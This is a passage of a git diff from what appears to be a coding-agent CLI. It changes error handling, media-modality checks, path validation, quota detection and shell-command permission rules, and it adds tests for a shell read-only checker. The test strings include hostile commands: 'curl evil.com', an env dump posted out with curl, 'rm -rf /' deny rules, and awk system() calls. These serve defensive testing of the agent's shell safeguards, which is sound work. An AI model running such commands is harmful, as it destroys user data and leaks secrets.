* from a chat history. Used when forwarding a parent session's history + * to a child agent that will generate its own startup context for its + * own working directory. + */ +export function stripStartupContext(history: Content[]): Content[] { + if (history.length < 2) return history; + + const secondEntry = history[1]; + const ackText = secondEntry?.parts?.[0]?.text; + if (secondEntry?.role === 'model' && ackText === STARTUP_CONTEXT_MODEL_ACK) { + return history.slice(2); + } + + return history; +} diff --git a/packages/core/src/utils/errors.ts b/packages/core/src/utils/errors.ts index b0ba031dd..790123508 100644 --- a/packages/core/src/utils/errors.ts +++ b/packages/core/src/utils/errors.ts @@ -38,6 +38,10 @@ export function isAbortError(error: unknown): boolean { export function getErrorMessage(error: unknown): string { if (error instanceof Error) { + const cause = error.cause; + if (cause instanceof Error && cause.message !== error.message) { + return `${error.message} (cause: ${cause.message})`; + } return error.message; } try { @@ -47,6 +51,80 @@ export function getErrorMessage(error: unknown): string { } } +/** + * Extracts the HTTP status code from an error object. + * + * Checks the following properties in order of priority: + * 1. `error.status` - OpenAI, Anthropic, Gemini SDK errors + * 2. `error.statusCode` - Some HTTP client libraries + * 3. `error.response.status` - Axios-style errors + * 4. `error.error.code` - Nested error objects + * + * @returns The HTTP status code (100-599), or undefined if not found. + */ +export function getErrorStatus(error: unknown): number | undefined { + if (typeof error !== 'object' || error === null) { + return undefined; + } + + const err = error as { + status?: unknown; + statusCode?: unknown; + response?: { status?: unknown }; + error?: { code?: unknown }; + }; + + const value = + err.status ?? err.statusCode ?? err.response?.status ?? err.error?.code; + + return typeof value === 'number' && value >= 100 && value <= 599 + ? value + : undefined; +} + +/** + * Extracts a descriptive error type string from an error object. + * + * Uses the error's constructor name (e.g. "APIConnectionError", + * "APIConnectionTimeoutError") which is more specific than the generic + * `.type` field. Falls back to `.type` for SDK errors that set it, + * then to `error.name`, then "unknown". + * + * For network errors, appends the cause code (e.g. "ECONNREFUSED") + * when available. + * + * @returns A string identifying the error type. + */ +export function getErrorType(error: unknown): string { + if (typeof error !== 'object' || error === null) { + return 'unknown'; + } + + // Prefer the constructor name — SDK subclasses like APIConnectionError, + // RateLimitError etc. have meaningful names. + const constructorName = + error instanceof Error && error.constructor.name !== 'Error' + ? error.constructor.name + : undefined; + + // .type is set by OpenAI SDK (e.g. "invalid_request_error") + const sdkType = (error as { type?: string }).type; + + const baseType = + constructorName ?? + sdkType ?? + (error instanceof Error ? error.name : 'unknown'); + + // For network errors, append the cause code (e.g. ECONNREFUSED, ETIMEDOUT) + const cause = error instanceof Error ? error.cause : undefined; + const causeCode = + cause && typeof cause === 'object' && 'code' in cause + ? (cause as { code?: string }).code + : undefined; + + return causeCode ? `${baseType}:${causeCode}` : baseType; +} + export class FatalError extends Error { constructor( message: string, diff --git a/packages/core/src/utils/fileUtils.test.ts b/packages/core/src/utils/fileUtils.test.ts index 0daa68c4e..b2210c3ec 100644 --- a/packages/core/src/utils/fileUtils.test.ts +++ b/packages/core/src/utils/fileUtils.test.ts @@ -59,6 +59,10 @@ describe('fileUtils', () => { getTruncateToolOutputThreshold: () => 2500, getTruncateToolOutputLines: () => 500, getTargetDir: () => tempRootDir, + getModel: () => 'qwen3.5-plus', + getContentGeneratorConfig: () => ({ + modalities: { image: true, video: true }, + }), getFileSystemService: () => fsService, } as unknown as Config; @@ -891,29 +895,73 @@ describe('fileUtils', () => { expect(result.returnDisplay).toContain('Read image file: image.png'); }); - it('should process a PDF file', async () => { + it('should reject image files when model does not support image', async () => { + const fakePngData = Buffer.from('fake png data'); + actualNodeFs.writeFileSync(testImageFilePath, fakePngData); + mockMimeGetType.mockReturnValue('image/png'); + + const mockConfigNoImage = { + ...mockConfig, + getContentGeneratorConfig: () => ({ modalities: {} }), + } as unknown as Config; + + const result = await processSingleFileContent( + testImageFilePath, + mockConfigNoImage, + ); + expect(typeof result.llmContent).toBe('string'); + expect(result.llmContent).toContain('Unsupported image file'); + expect(result.llmContent).toContain('does not support image input'); + expect(result.returnDisplay).toContain('Skipped image file'); + }); + + it('should reject PDF files when model does not support PDF', async () => { const fakePdfData = Buffer.from('fake pdf data'); actualNodeFs.writeFileSync(testPdfFilePath, fakePdfData); mockMimeGetType.mockReturnValue('application/pdf'); + + const mockConfigNoPdf = { + ...mockConfig, + getContentGeneratorConfig: () => ({ + modalities: { image: true }, + }), + } as unknown as Config; + const result = await processSingleFileContent( testPdfFilePath, - mockConfig, + mockConfigNoPdf, ); - expect( - (result.llmContent as { inlineData: unknown }).inlineData, - ).toBeDefined(); + expect(typeof result.llmContent).toBe('string'); + expect(result.llmContent).toContain('Unsupported pdf file'); + expect(result.llmContent).toContain( + 'does not support PDF input directly', + ); + expect(result.llmContent).toContain('/extensions install'); + expect(result.returnDisplay).toContain('Skipped pdf file'); + }); + + it('should accept PDF files when model supports PDF', async () => { + const fakePdfData = Buffer.from('fake pdf data'); + actualNodeFs.writeFileSync(testPdfFilePath, fakePdfData); + mockMimeGetType.mockReturnValue('application/pdf'); + + const mockConfigWithPdf = { + ...mockConfig, + getContentGeneratorConfig: () => ({ + modalities: { image: true, pdf: true }, + }), + } as unknown as Config; + + const result = await processSingleFileContent( + testPdfFilePath, + mockConfigWithPdf, + ); + expect(result.llmContent).toHaveProperty('inlineData'); expect( (result.llmContent as { inlineData: { mimeType: string } }).inlineData .mimeType, ).toBe('application/pdf'); - expect( - (result.llmContent as { inlineData: { data: string } }).inlineData.data, - ).toBe(fakePdfData.toString('base64')); - expect( - (result.llmContent as { inlineData: { displayName?: string } }) - .inlineData.displayName, - ).toBe('document.pdf'); - expect(result.returnDisplay).toContain('Read pdf file: document.pdf'); + expect(result.returnDisplay).toContain('Read pdf file'); }); it('should read an SVG file as text when under 1MB', async () => { diff --git a/packages/core/src/utils/fileUtils.ts b/packages/core/src/utils/fileUtils.ts index 41029138e..8eefc0880 100644 --- a/packages/core/src/utils/fileUtils.ts +++ b/packages/core/src/utils/fileUtils.ts @@ -18,6 +18,7 @@ import { ToolErrorType } from '../tools/tool-error.js'; import { BINARY_EXTENSIONS } from './ignorePatterns.js'; import type { Config } from '../config/config.js'; import { createDebugLogger } from './debugLogger.js'; +import type { InputModalities } from '../core/contentGenerator.js'; import { detectEncodingFromBuffer } from './systemEncoding.js'; const debugLogger = createDebugLogger('FILE_UTILS'); @@ -227,7 +228,7 @@ export async function readFileWithEncodingInfo( return { content: full.toString('utf8'), encoding: 'utf-8', bom: false }; } - // Not valid UTF-8 — try chardet-based encoding detection + // Not valid UTF-8 — try chardet statistical detection const detected = detectEncodingFromBuffer(full); if (detected && !isUtf8CompatibleEncoding(detected)) { try { @@ -507,6 +508,42 @@ export interface ProcessedFileReadResult { linesShown?: [number, number]; // For text files [startLine, endLine] (1-based for display) } +/** + * For media file types, returns the corresponding modality key. + * Returns undefined for non-media types (text, binary, svg) which are always supported. + */ +function mediaModalityKey( + fileType: 'image' | 'pdf' | 'audio' | 'video' | 'text' | 'binary' | 'svg', +): keyof InputModalities | undefined { + if ( + fileType === 'image' || + fileType === 'pdf' || + fileType === 'audio' || + fileType === 'video' + ) { + return fileType; + } + return undefined; +} + +/** + * Build the same unsupported-modality message used by the converter, + * so the LLM sees a consistent hint regardless of where the check fires. + */ +function unsupportedModalityMessage( + modality: string, + displayName: string, +): string { + let hint: string; + if (modality === 'pdf') { + hint = + 'This model does not support PDF input directly. The read_file tool cannot extract PDF content either. To extract text from the PDF file, try using skills if applicable, or guide user to install pdf skill by running this slash command:\n/extensions install https://github.com/anthropics/skills:document-skills'; + } else { + hint = `This model does not support ${modality} input. The read_file tool cannot process this type of file either. To handle this file, try using skills if applicable, or any tools installed at system wide, or let the user know you cannot process this type of file.`; + } + return `[Unsupported ${modality} file: "${displayName}". ${hint}]`; +} + /** * Reads and processes a single file, handling text, images, and PDFs. * @param filePath Absolute path to the file. @@ -561,6 +598,26 @@ export async function processSingleFileContent( .replace(/\\/g, '/'); const displayName = path.basename(filePath); + + // Check modality support for media files using the resolved config + // (same source of truth the converter uses at API-call time). + const modality = mediaModalityKey(fileType); + if (modality) { + const modalities: InputModalities = + config.getContentGeneratorConfig()?.modalities ?? {}; + if (!modalities[modality]) { + const message = unsupportedModalityMessage(modality, displayName); + debugLogger.warn( + `Model '${config.getModel()}' does not support ${modality} input. ` + + `Skipping file: ${relativePathForDisplay}`, + ); + return { + llmContent: message, + returnDisplay: `Skipped ${fileType} file: ${relativePathForDisplay} (model doesn't support ${modality} input)`, + }; + } + } + switch (fileType) { case 'binary': { return { diff --git a/packages/core/src/utils/gitUtils.ts b/packages/core/src/utils/gitUtils.ts index e63b6bebd..493c89bd6 100644 --- a/packages/core/src/utils/gitUtils.ts +++ b/packages/core/src/utils/gitUtils.ts @@ -88,3 +88,61 @@ export const getGitBranch = (cwd: string): string | undefined => { return undefined; } }; + +/** + * Gets the git repository full name (owner/repo), if in a git repository. + * Tries to get the name from the remote URL first, then falls back to the directory name. + */ +export const getGitRepoName = (cwd: string): string | undefined => { + try { + // Try to get the repository name from the remote URL + const remoteUrl = execSync('git remote get-url origin', { + cwd, + encoding: 'utf8', + stdio: ['pipe', 'pipe', 'pipe'], + }).trim(); + + if (remoteUrl) { + // Extract owner/repo from various URL formats: + // - https://github.com/owner/repo.git -> owner/repo + // - git@github.com:owner/repo.git -> owner/repo + // - https://gitlab.com/owner/repo -> owner/repo + // - https://github.com/owner/repo/extra -> owner/repo (ignore extra path) + + // Handle SSH format: git@host.com:owner/repo.git + let normalizedUrl = remoteUrl; + if (remoteUrl.startsWith('git@')) { + normalizedUrl = remoteUrl.replace(/^git@[^:]+:/, 'https://host.com/'); + } + + try { + const url = new URL(normalizedUrl); + // Remove .git suffix and split path + const pathParts = url.pathname + .replace(/\.git$/, '') + .split('/') + .filter(Boolean); + if (pathParts.length >= 2) { + // Return owner/repo format + return `${pathParts[0]}/${pathParts[1]}`; + } + } catch { + // URL parsing failed, try regex fallback + const match = remoteUrl.match(/[:/]([^/]+)\/([^/]+?)(?:\.git)?$/); + if (match && match[1] && match[2]) { + return `${match[1]}/${match[2]}`; + } + } + } + } catch { + // Fall back to directory name if remote URL is not available + } + + // Fallback: use the directory name of the git root + const gitRoot = findGitRoot(cwd); + if (gitRoot) { + return path.basename(gitRoot); + } + + return undefined; +}; diff --git a/packages/core/src/utils/pathReader.test.ts b/packages/core/src/utils/pathReader.test.ts index 282a7d6d1..97717d0a3 100644 --- a/packages/core/src/utils/pathReader.test.ts +++ b/packages/core/src/utils/pathReader.test.ts @@ -31,6 +31,9 @@ const createMockConfig = ( getFileService: () => mockFileService, getTruncateToolOutputThreshold: () => 2500, getTruncateToolOutputLines: () => 500, + getContentGeneratorConfig: () => ({ + modalities: { image: true, pdf: true, audio: true, video: true }, + }), } as unknown as Config; }; diff --git a/packages/core/src/utils/paths.ts b/packages/core/src/utils/paths.ts index dc4434ece..6067c5dc4 100644 --- a/packages/core/src/utils/paths.ts +++ b/packages/core/src/utils/paths.ts @@ -241,6 +241,10 @@ export function isSubpath(parentPath: string, childPath: string): boolean { ); } +export function isSubpaths(parentPath: string[], childPath: string): boolean { + return parentPath.some((p) => isSubpath(p, childPath)); +} + /** * Resolves a path with tilde (~) expansion and relative path resolution. * Handles tilde expansion for home directory and resolves relative paths @@ -272,6 +276,13 @@ export interface PathValidationOptions { * If true, allows both files and directories. If false (default), only allows directories. */ allowFiles?: boolean; + + /** + * If true, allows paths outside the workspace boundaries. + * The caller is responsible for adjusting permissions (e.g. 'ask') for + * external paths. + */ + allowExternalPaths?: boolean; } /** @@ -287,13 +298,22 @@ export function validatePath( resolvedPath: string, options: PathValidationOptions = {}, ): void { - const { allowFiles = false } = options; + const { allowFiles = false, allowExternalPaths = false } = options; const workspaceContext = config.getWorkspaceContext(); + const isWithinWorkspace = + workspaceContext.isPathWithinWorkspace(resolvedPath); - if (!workspaceContext.isPathWithinWorkspace(resolvedPath)) { + if (!allowExternalPaths && !isWithinWorkspace) { throw new Error('Path is not within workspace'); } + // For external paths where allowExternalPaths is true, skip filesystem checks. + // The path may not exist locally on the current machine, and permissions for + // external paths are handled at runtime rather than at validation time. + if (allowExternalPaths && !isWithinWorkspace) { + return; + } + try { const stats = fs.statSync(resolvedPath); if (!allowFiles && !stats.isDirectory()) { diff --git a/packages/core/src/utils/quotaErrorDetection.test.ts b/packages/core/src/utils/quotaErrorDetection.test.ts index 01dccec24..0da986623 100644 --- a/packages/core/src/utils/quotaErrorDetection.test.ts +++ b/packages/core/src/utils/quotaErrorDetection.test.ts @@ -16,52 +16,55 @@ import { describe('quotaErrorDetection', () => { describe('isQwenQuotaExceededError', () => { - it('should detect insufficient_quota error message', () => { - const error = new Error('insufficient_quota'); - expect(isQwenQuotaExceededError(error)).toBe(true); - }); - - it('should detect free allocated quota exceeded error message', () => { - const error = new Error('Free allocated quota exceeded.'); - expect(isQwenQuotaExceededError(error)).toBe(true); - }); - - it('should detect quota exceeded error message', () => { - const error = new Error('quota exceeded'); - expect(isQwenQuotaExceededError(error)).toBe(true); - }); - - it('should detect quota exceeded in string error', () => { - const error = 'insufficient_quota'; - expect(isQwenQuotaExceededError(error)).toBe(true); - }); - - it('should detect quota exceeded in structured error', () => { - const error = { message: 'Free allocated quota exceeded.', status: 429 }; - expect(isQwenQuotaExceededError(error)).toBe(true); - }); - - it('should detect quota exceeded in API error', () => { - const error: ApiError = { - error: { - code: 429, - message: 'insufficient_quota', - status: 'RESOURCE_EXHAUSTED', - details: [], - }, + it('should detect the Qwen insufficient_quota error', () => { + const error = { + status: 429, + code: 'insufficient_quota', + message: 'Free allocated quota exceeded.', }; expect(isQwenQuotaExceededError(error)).toBe(true); }); - it('should not detect throttling errors as quota exceeded', () => { - const error = new Error('requests throttling triggered'); + it('should not match when status is not 429', () => { + const error = { + status: 400, + code: 'insufficient_quota', + message: 'Free allocated quota exceeded.', + }; expect(isQwenQuotaExceededError(error)).toBe(false); }); - it('should not detect unrelated errors', () => { - const error = new Error('Network error'); + it('should not match temporary throttling (concurrency 429)', () => { + const error = { + status: 429, + code: 'rate_limit_exceeded', + message: 'Rate limit exceeded', + }; expect(isQwenQuotaExceededError(error)).toBe(false); }); + + it('should not match paid account quota exceeded', () => { + const error = { + status: 429, + code: 'insufficient_quota', + message: 'You exceeded your current quota.', + }; + expect(isQwenQuotaExceededError(error)).toBe(false); + }); + + it('should not match plain Error objects', () => { + const error = new Error('insufficient_quota'); + expect(isQwenQuotaExceededError(error)).toBe(false); + }); + + it('should not match string errors', () => { + expect(isQwenQuotaExceededError('insufficient_quota')).toBe(false); + }); + + it('should not match null or undefined', () => { + expect(isQwenQuotaExceededError(null)).toBe(false); + expect(isQwenQuotaExceededError(undefined)).toBe(false); + }); }); describe('isProQuotaExceededError', () => { diff --git a/packages/core/src/utils/quotaErrorDetection.ts b/packages/core/src/utils/quotaErrorDetection.ts index 1c8af9cd3..87e50aa98 100644 --- a/packages/core/src/utils/quotaErrorDetection.ts +++ b/packages/core/src/utils/quotaErrorDetection.ts @@ -100,27 +100,20 @@ export function isGenericQuotaExceededError(error: unknown): boolean { } export function isQwenQuotaExceededError(error: unknown): boolean { - // Check for Qwen insufficient quota errors (should not retry) - const checkMessage = (message: string): boolean => { - const lowerMessage = message.toLowerCase(); - return ( - lowerMessage.includes('insufficient_quota') || - lowerMessage.includes('free allocated quota exceeded') || - (lowerMessage.includes('quota') && lowerMessage.includes('exceeded')) - ); + // Match the specific Qwen free-tier quota error to distinguish it from + // temporary throttling (429 due to concurrency) or paid account quota limits. + if (typeof error !== 'object' || error === null) { + return false; + } + const { status, code, message } = error as { + status?: number; + code?: string; + message?: string; }; - - if (typeof error === 'string') { - return checkMessage(error); - } - - if (isStructuredError(error)) { - return checkMessage(error.message); - } - - if (isApiError(error)) { - return checkMessage(error.error.message); - } - - return false; + return ( + status === 429 && + code === 'insufficient_quota' && + typeof message === 'string' && + message.toLowerCase().includes('free allocated quota exceeded') + ); } diff --git a/packages/core/src/utils/retry.test.ts b/packages/core/src/utils/retry.test.ts index a628719a5..a0e269950 100644 --- a/packages/core/src/utils/retry.test.ts +++ b/packages/core/src/utils/retry.test.ts @@ -7,7 +7,8 @@ /* eslint-disable @typescript-eslint/no-explicit-any */ import { describe, it, expect, vi, beforeEach, afterEach } from 'vitest'; import type { HttpError } from './retry.js'; -import { getErrorStatus, retryWithBackoff } from './retry.js'; +import { retryWithBackoff } from './retry.js'; +import { getErrorStatus } from './errors.js'; import { setSimulate429 } from './testUtils.js'; import { AuthType } from '../core/contentGenerator.js'; @@ -312,7 +313,10 @@ describe('retryWithBackoff', () => { }); it('should throw immediately for Qwen OAuth with insufficient_quota message', async () => { - const errorWithInsufficientQuota = new Error('insufficient_quota'); + const errorWithInsufficientQuota = Object.assign( + new Error('Free allocated quota exceeded.'), + { status: 429, code: 'insufficient_quota' }, + ); const fn = vi.fn().mockRejectedValue(errorWithInsufficientQuota); @@ -330,8 +334,9 @@ describe('retryWithBackoff', () => { }); it('should throw immediately for Qwen OAuth with free allocated quota exceeded message', async () => { - const errorWithQuotaExceeded = new Error( - 'Free allocated quota exceeded.', + const errorWithQuotaExceeded = Object.assign( + new Error('Free allocated quota exceeded.'), + { status: 429, code: 'insufficient_quota' }, ); const fn = vi.fn().mockRejectedValue(errorWithQuotaExceeded); @@ -403,7 +408,10 @@ describe('retryWithBackoff', () => { }); it('should throw immediately for Qwen OAuth with quota message', async () => { - const errorWithQuota = new Error('quota exceeded'); + const errorWithQuota = Object.assign( + new Error('Free allocated quota exceeded.'), + { status: 429, code: 'insufficient_quota' }, + ); const fn = vi.fn().mockRejectedValue(errorWithQuota); diff --git a/packages/core/src/utils/retry.ts b/packages/core/src/utils/retry.ts index 5ce79f08f..e03a3d682 100644 --- a/packages/core/src/utils/retry.ts +++ b/packages/core/src/utils/retry.ts @@ -8,6 +8,7 @@ import type { GenerateContentResponse } from '@google/genai'; import { AuthType } from '../core/contentGenerator.js'; import { isQwenQuotaExceededError } from './quotaErrorDetection.js'; import { createDebugLogger } from './debugLogger.js'; +import { getErrorStatus } from './errors.js'; const debugLogger = createDebugLogger('RETRY'); @@ -151,38 +152,6 @@ export async function retryWithBackoff( throw new Error('Retry attempts exhausted'); } -/** - * Extracts the HTTP status code from an error object. - * - * Checks the following properties in order of priority: - * 1. `error.status` - OpenAI, Anthropic, Gemini SDK errors - * 2. `error.statusCode` - Some HTTP client libraries - * 3. `error.response.status` - Axios-style errors - * 4. `error.error.code` - Nested error objects - * - * @param error The error object. - * @returns The HTTP status code (100-599), or undefined if not found. - */ -export function getErrorStatus(error: unknown): number | undefined { - if (typeof error !== 'object' || error === null) { - return undefined; - } - - const err = error as { - status?: unknown; - statusCode?: unknown; - response?: { status?: unknown }; - error?: { code?: unknown }; - }; - - const value = - err.status ?? err.statusCode ?? err.response?.status ?? err.error?.code; - - return typeof value === 'number' && value >= 100 && value <= 599 - ? value - : undefined; -} - /** * Extracts the Retry-After delay from an error object's headers. * @param error The error object. diff --git a/packages/core/src/utils/shell-utils.test.ts b/packages/core/src/utils/shell-utils.test.ts index b974bfd5a..7a02ba4a7 100644 --- a/packages/core/src/utils/shell-utils.test.ts +++ b/packages/core/src/utils/shell-utils.test.ts @@ -44,8 +44,8 @@ beforeEach(() => { mockParse.mockImplementation((cmd: string) => cmd.split(' ')); config = { getCoreTools: () => [], - getExcludeTools: () => [], - getAllowedTools: () => [], + getPermissionsDeny: () => [], + getPermissionsAllow: () => [], } as unknown as Config; }); @@ -75,7 +75,7 @@ describe('isCommandAllowed', () => { }); it('should block a command if it is in the blocked list', () => { - config.getExcludeTools = () => ['ShellTool(rm -rf /)']; + config.getPermissionsDeny = () => ['ShellTool(rm -rf /)']; const result = isCommandAllowed('rm -rf /', config); expect(result.allowed).toBe(false); expect(result.reason).toBe( @@ -85,7 +85,7 @@ describe('isCommandAllowed', () => { it('should prioritize the blocklist over the allowlist', () => { config.getCoreTools = () => ['ShellTool(rm -rf /)']; - config.getExcludeTools = () => ['ShellTool(rm -rf /)']; + config.getPermissionsDeny = () => ['ShellTool(rm -rf /)']; const result = isCommandAllowed('rm -rf /', config); expect(result.allowed).toBe(false); expect(result.reason).toBe( @@ -100,7 +100,7 @@ describe('isCommandAllowed', () => { }); it('should block any command when a wildcard is in excludeTools', () => { - config.getExcludeTools = () => ['run_shell_command']; + config.getPermissionsDeny = () => ['run_shell_command']; const result = isCommandAllowed('any random command', config); expect(result.allowed).toBe(false); expect(result.reason).toBe( @@ -110,7 +110,7 @@ describe('isCommandAllowed', () => { it('should block a command on the blocklist even with a wildcard allow', () => { config.getCoreTools = () => ['ShellTool']; - config.getExcludeTools = () => ['ShellTool(rm -rf /)']; + config.getPermissionsDeny = () => ['ShellTool(rm -rf /)']; const result = isCommandAllowed('rm -rf /', config); expect(result.allowed).toBe(false); expect(result.reason).toBe( @@ -128,7 +128,7 @@ describe('isCommandAllowed', () => { }); it('should block a chained command if any part is blocked', () => { - config.getExcludeTools = () => ['run_shell_command(rm)']; + config.getPermissionsDeny = () => ['run_shell_command(rm)']; const result = isCommandAllowed('echo "hello" && rm -rf /', config); expect(result.allowed).toBe(false); expect(result.reason).toBe( @@ -298,7 +298,7 @@ describe('checkCommandPermissions', () => { }); it('should return a detailed failure object for a blocked command', () => { - config.getExcludeTools = () => ['ShellTool(rm)']; + config.getPermissionsDeny = () => ['ShellTool(rm)']; const result = checkCommandPermissions('rm -rf /', config); expect(result).toEqual({ allAllowed: false, @@ -364,7 +364,7 @@ describe('checkCommandPermissions', () => { }); it('should block a command on the sessionAllowlist if it is also globally blocked', () => { - config.getExcludeTools = () => ['run_shell_command(rm)']; + config.getPermissionsDeny = () => ['run_shell_command(rm)']; const result = checkCommandPermissions( 'rm -rf /', config, diff --git a/packages/core/src/utils/shell-utils.ts b/packages/core/src/utils/shell-utils.ts index 1c839530f..f0cd2bb13 100644 --- a/packages/core/src/utils/shell-utils.ts +++ b/packages/core/src/utils/shell-utils.ts @@ -606,22 +606,19 @@ export function detectCommandSubstitution(command: string): boolean { } /** - * Checks a shell command against security policies and allowlists. + * Checks a shell command against security policies and permission rules. * - * This function operates in one of two modes depending on the presence of - * the `sessionAllowlist` parameter: + * Uses PermissionManager (via config.getPermissionManager()) to evaluate each + * sub-command. The function operates in two modes: * - * 1. **"Default Deny" Mode (sessionAllowlist is provided):** This is the - * strictest mode, used for user-defined scripts like custom commands. - * A command is only permitted if it is found on the global `coreTools` - * allowlist OR the provided `sessionAllowlist`. It must not be on the - * global `excludeTools` blocklist. + * 1. **"Default Deny" Mode (sessionAllowlist is provided):** Used for + * user-defined scripts / custom commands. A command is only permitted if + * it is found in the allow rules OR the provided `sessionAllowlist`. + * Commands not explicitly allowed are treated as a soft denial. * - * 2. **"Default Allow" Mode (sessionAllowlist is NOT provided):** This mode - * is used for direct tool invocations (e.g., by the model). If a strict - * global `coreTools` allowlist exists, commands must be on it. Otherwise, - * any command is permitted as long as it is not on the `excludeTools` - * blocklist. + * 2. **"Default Allow" Mode (sessionAllowlist is NOT provided):** Used for + * direct tool invocations by the model. Commands with a 'deny' decision + * are hard-blocked; 'ask' requires confirmation; all others are allowed. * * @param command The shell command string to validate. * @param config The application configuration. @@ -656,8 +653,71 @@ export function checkCommandPermissions( params: { command: '' }, } as AnyToolInvocation & { params: { command: string } }; + const pm = config.getPermissionManager?.(); + + // When PermissionManager is available, use PM-based evaluation. + if (pm) { + const disallowedCommands: string[] = []; + + for (const cmd of commandsToValidate) { + // 1. Session allowlist always wins (checked first regardless of PM rules) + if (sessionAllowlist) { + invocation.params['command'] = cmd; + const isSessionAllowed = doesToolInvocationMatch( + 'run_shell_command', + invocation, + [...sessionAllowlist].flatMap((c) => + SHELL_TOOL_NAMES.map((name) => `${name}(${c})`), + ), + ); + if (isSessionAllowed) continue; + } + + const decision = pm.isCommandAllowed(cmd); + + if (decision === 'deny') { + return { + allAllowed: false, + disallowedCommands: [cmd], + blockReason: `Command '${cmd}' is blocked by permission rules`, + isHardDenial: true, + }; + } + + if (decision === 'allow') continue; + + // 'ask' → always requires confirmation + if (decision === 'ask') { + disallowedCommands.push(cmd); + continue; + } + + // 'default': behaviour depends on mode + if (sessionAllowlist !== undefined) { + // Default Deny mode: unrecognised commands require confirmation + disallowedCommands.push(cmd); + } + // Default Allow mode: not matched by any rule → allowed + } + + if (disallowedCommands.length > 0) { + return { + allAllowed: false, + disallowedCommands, + blockReason: `Command(s) require confirmation. Disallowed commands: ${disallowedCommands.map((c) => JSON.stringify(c)).join(', ')}`, + isHardDenial: false, + }; + } + + return { allAllowed: true, disallowedCommands: [] }; + } + + // ── Legacy fallback (no PermissionManager) ────────────────────────────── + // Used by SDK consumers that have not yet migrated to the permissions system, + // or in unit tests that mock only getCoreTools/getPermissionsDeny. + // 1. Blocklist Check (Highest Priority) - const excludeTools = config.getExcludeTools() || []; + const excludeTools = config.getPermissionsDeny() || []; const isWildcardBlocked = SHELL_TOOL_NAMES.some((name) => excludeTools.includes(name), ); diff --git a/packages/core/src/utils/shellAstParser.test.ts b/packages/core/src/utils/shellAstParser.test.ts new file mode 100644 index 000000000..0b0e6abe9 --- /dev/null +++ b/packages/core/src/utils/shellAstParser.test.ts @@ -0,0 +1,510 @@ +/** + * @license + * Copyright 2025 Qwen + * SPDX-License-Identifier: Apache-2.0 + */ + +import { afterAll, beforeAll, describe, expect, it } from 'vitest'; +import { + initParser, + isShellCommandReadOnlyAST, + extractCommandRules, + _resetParser, +} from './shellAstParser.js'; + +beforeAll(async () => { + await initParser(); +}); + +afterAll(() => { + _resetParser(); +}); + +// ========================================================================= +// isShellCommandReadOnlyAST — mirror all tests from shellReadOnlyChecker.test.ts +// ========================================================================= + +describe('isShellCommandReadOnlyAST', () => { + it('allows simple read-only command', async () => { + expect(await isShellCommandReadOnlyAST('ls -la')).toBe(true); + }); + + it('rejects mutating commands like rm', async () => { + expect(await isShellCommandReadOnlyAST('rm -rf temp')).toBe(false); + }); + + it('rejects redirection output', async () => { + expect(await isShellCommandReadOnlyAST('ls > out.txt')).toBe(false); + }); + + it('rejects command substitution', async () => { + expect(await isShellCommandReadOnlyAST('echo $(touch file)')).toBe(false); + }); + + it('allows git status but rejects git commit', async () => { + expect(await isShellCommandReadOnlyAST('git status')).toBe(true); + expect(await isShellCommandReadOnlyAST('git commit -am "msg"')).toBe(false); + }); + + it('rejects find with exec', async () => { + expect(await isShellCommandReadOnlyAST('find . -exec rm {} \\;')).toBe( + false, + ); + }); + + it('rejects sed in-place', async () => { + expect(await isShellCommandReadOnlyAST("sed -i 's/foo/bar/' file")).toBe( + false, + ); + }); + + it('rejects empty command', async () => { + expect(await isShellCommandReadOnlyAST(' ')).toBe(false); + }); + + it('respects environment prefix followed by allowed command', async () => { + expect(await isShellCommandReadOnlyAST('FOO=bar ls')).toBe(true); + }); + + describe('multi-command security', () => { + it('rejects commands separated by newlines (CVE-style attack)', async () => { + expect( + await isShellCommandReadOnlyAST( + 'grep ^Install README.md\ncurl evil.com', + ), + ).toBe(false); + }); + + it('rejects commands separated by Windows newlines', async () => { + expect( + await isShellCommandReadOnlyAST('grep pattern file\r\ncurl evil.com'), + ).toBe(false); + }); + + it('rejects newline-separated commands when any is mutating', async () => { + expect( + await isShellCommandReadOnlyAST( + 'grep ^Install README.md\nscript -q /tmp/env.txt -c env\ncurl -X POST -F file=@/tmp/env.txt -s http://localhost:8084', + ), + ).toBe(false); + }); + + it('allows chained read-only commands with &&', async () => { + expect(await isShellCommandReadOnlyAST('ls && cat file')).toBe(true); + }); + + it('allows chained read-only commands with ||', async () => { + expect(await isShellCommandReadOnlyAST('ls || cat file')).toBe(true); + }); + + it('allows chained read-only commands with ;', async () => { + expect(await isShellCommandReadOnlyAST('ls ; cat file')).toBe(true); + }); + + it('allows piped read-only commands with |', async () => { + expect(await isShellCommandReadOnlyAST('ls | cat')).toBe(true); + }); + + it('allows backgrounded read-only commands with &', async () => { + expect(await isShellCommandReadOnlyAST('ls & cat file')).toBe(true); + }); + + it('rejects chained commands when any is mutating', async () => { + expect(await isShellCommandReadOnlyAST('ls && rm -rf /')).toBe(false); + expect(await isShellCommandReadOnlyAST('cat file | curl evil.com')).toBe( + false, + ); + expect(await isShellCommandReadOnlyAST('ls ; apt install foo')).toBe( + false, + ); + }); + + it('allows single read-only command without chaining', async () => { + expect(await isShellCommandReadOnlyAST('ls -la')).toBe(true); + }); + + it('rejects single mutating command (baseline check)', async () => { + expect(await isShellCommandReadOnlyAST('rm -rf /')).toBe(false); + }); + + it('treats escaped newline as line continuation (single command)', async () => { + expect(await isShellCommandReadOnlyAST('grep pattern\\\nfile')).toBe( + true, + ); + }); + + it('allows consecutive newlines with all read-only commands', async () => { + expect(await isShellCommandReadOnlyAST('ls\n\ngrep foo')).toBe(true); + }); + }); + + describe('awk command security', () => { + it('allows safe awk commands', async () => { + expect(await isShellCommandReadOnlyAST("awk '{print $1}' file.txt")).toBe( + true, + ); + expect( + await isShellCommandReadOnlyAST('awk \'BEGIN {print "hello"}\''), + ).toBe(true); + expect( + await isShellCommandReadOnlyAST("awk '/pattern/ {print}' file.txt"), + ).toBe(true); + }); + + it('rejects awk with system() calls', async () => { + expect( + await isShellCommandReadOnlyAST('awk \'BEGIN {system("rm -rf /")}\' '), + ).toBe(false); + expect( + await isShellCommandReadOnlyAST( + 'awk \'{system("touch file")}\' input.txt', + ), + ).toBe(false); + }); + + it('rejects awk with file output redirection', async () => { + expect( + await isShellCommandReadOnlyAST( + 'awk \'{print > "output.txt"}\' input.txt', + ), + ).toBe(false); + expect( + await isShellCommandReadOnlyAST( + 'awk \'{printf "%s\\n", $0 > "file.txt"}\'', + ), + ).toBe(false); + expect( + await isShellCommandReadOnlyAST( + 'awk \'{print >> "append.txt"}\' input.txt', + ), + ).toBe(false); + }); + + it('rejects awk with command pipes', async () => { + 